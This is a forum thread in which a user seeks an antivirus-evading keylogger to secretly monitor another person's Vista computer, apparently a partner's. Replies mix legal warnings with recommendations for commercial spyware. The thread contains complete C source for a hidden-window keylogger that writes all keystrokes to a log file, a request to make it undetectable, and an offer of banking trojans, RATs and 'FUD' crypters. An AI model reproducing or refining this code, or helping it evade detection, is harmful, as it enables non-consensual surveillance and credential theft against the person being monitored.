Need a keylogger for Vista, log stored locally not remote

Need to install a keylogger on a computer I have access to. Anyone have something simple that won't get picked up by antivirus? It's okay if the log is stored on the computer, don't need anything emailed. Just something simple. I know the smokey bear posted something a couple years ago (i searched before posting this) but the file's no longer hosted and he's not on ICQ. Hope someone can help.

If you own the computer and are sure you're not falling afoul of the law, a hardware keylogger is a winner. Be very, very careful of the law, though. If you happen to log credentials to a site and use them, that's "unauthorized access to a secure computer system" across state lines - a FEDERAL crime.

I'm a licensed private investigator and of course I'm a major geek. The two don't often mix, not with stuff like keyloggers, due to legal concerns. Also, IT based surveillance often only reveals something suspicious, but you're already suspicious, so that gets you nowhere. To actually confirm your suspicions other avenues are often best.

If you'd like you can call the office and we can discuss the best way to resolve your concerns.

if you have access to the computer, then when you install it, tell the AV to ignore it...

AV's are crazy annoying, it will probably popup a warning when I am not the one on the computer

Hmm actually it appears the email bounced back:

"Delivery to the following recipient failed permanently:

**removed email**

Technical details of permanent failure:
Account disabled"

Anyway I was going to suggest SpectorSoft, I have used it for a few years both on Mac and PC and have never seen the AV trigger.

:2 cents:

mkx 12-21-2011 10:29 AM

I went to their website, was kinda looking for something non commercial. I will give spectorsoft a try though, is it free?

I would maybe wait for others to chime in with their suggestions first as SpectorSoft is not free. I have not used anything else so I cannot compare. Maybe there is something better which I am not aware of.

But it has 100% got the job done for me. I used the local one for a while, now using eBlaster which emails me the reports. Both work well and have given me no problems. In the past it helped me uncover a good amount of "dirt".

just need something real simple. smokey the bear posted a download link of one back in 2008, hopefully he still has it or someone else does and can upload it again.

The "simple" ones I used years ago crammed all the text and activity into one file and it was tough to sort through. SpectorSoft's software organizes it all nicely for you, via categories like "Browser, Facebook Activity, IM Activity, All Keys Typed, etc". For me it was well worth the money. Plus many of the simple ones only tracked local key strokes so it would not include the other side of an IM conversation for instance.

But if you are just looking to capture a simple password or something there might be a free solution out there. I have been able to do this via packet sniffing of my own network in the past, which I used free tools to accomplish.

Anyway just offering my input on a piece of software I have been very happy with. You get what you pay for.

blazin 12-21-2011 10:47 AM

Agree... you should dump that ho!!!

lucas131 12-21-2011 10:50 AM

In White the court ruled that reading SAVED emails is not a violation of federal wiretapping laws, but recording them as they are typed or sent IS wiretapping, a federal felony. I hope you're not committing a felony to learn about something that's going to come up on court, like an affair or theft. That could be very costly.

If the user is an employee using a computer owned by the employer, emails can be saved with effective notice and there are a few other cases when it's ok.
In most cases, there's a more effective way that's not a felony - like logging internet traffic at your firewall.

All I want is something really simple, not a commercial one. I did a search and found how to compile my own in c++. The below code works perfect for me however it is getting picked up by antivirus and getting an error while trying to open the exe on a windows vista machine. Is there anyone who can modify the code so it doesn't get picked up? Also does the not opening in Vista have anything to do with the antivirus or is it just not supported for Vista. I am using Dev C++

Code:

#include <stdio.h>
#include <windows.h>
#include <Winuser.h>

void keys(int key,char *file)
{
FILE *key_file;
key_file = fopen(file,"a+");

if (key==8)
fprintf(key_file,"%s","[TAB]");

if (key ==VK_SHIFT)
fprintf(key_file,"%s","[SHIFT]");

if (key ==VK_CONTROL)
fprintf(key_file,"%s","[CTRL]");

if (key ==VK_PAUSE)
fprintf(key_file,"%s","[PAUSE]");

if (key ==VK_KANA)
fprintf(key_file,"%s","[Kana]");
if (key ==VK_ESCAPE)

fprintf(key_file,"%s","[ESC]");
if (key ==VK_END)

fprintf(key_file,"%s","[END]");
if (key==VK_HOME)

fprintf(key_file,"%s","[HOME]");
if (key ==VK_LEFT)

fprintf(key_file,"%s","[LEFT]");
if (key ==VK_UP)

fprintf(key_file,"%s","[UP]");
if (key ==VK_RIGHT)

fprintf(key_file,"%s","[RIGHT]");
if (key ==VK_DOWN)

fprintf(key_file,"%s","[DOWN]");
if (key ==VK_SNAPSHOT)

fprintf(key_file,"%s","[PRINT]");
if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUM LOCK]");
if (key ==190 || key==110)

fprintf(key_file,"%s",".");
if (key >=96 && key <= 105){

        key = key - 48;

        fprintf(key_file,"%s",&key);

}

if (key >=48 && key <= 59)
fprintf(key_file,"%s",&key);

if (key !=VK_LBUTTON || key !=VK_RBUTTON){

        if (key >=65 && key <=90){

                if (GetKeyState(VK_CAPITAL))

                        fprintf(key_file,"%s",&key);
 else

 {

        key = key +32;

        fprintf(key_file,"%s",&key);

 }
}

}

fclose(key_file);

}

int main()
{

    //start stealth mode
HWND stealth;
AllocConsole();
stealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);
// end stealth mode

char i;

char test[MAX_PATH];
GetWindowsDirectory(test,sizeof(test));
strcat(test,"\\log.txt");

while(1){

        for(i=8;i<=190;i++){

        if (GetAsyncKeyState(i) == -32767)

        {

      keys (i,test);

        }
}
}
}

I know a few good keyloggers and rats. Why do you need a keylogger btw? Do you want to get all the passwords stored on the computer?

I can give you a banking trojan as well, ;)

Well for the Anti Virus, I know a few good crypters that make the keylogger (the file that you created with the keylogger program) FUD, which means fully undetectable. So the file will stay FUD for 5 hours up to 3 days.

PM me if you want to know more.
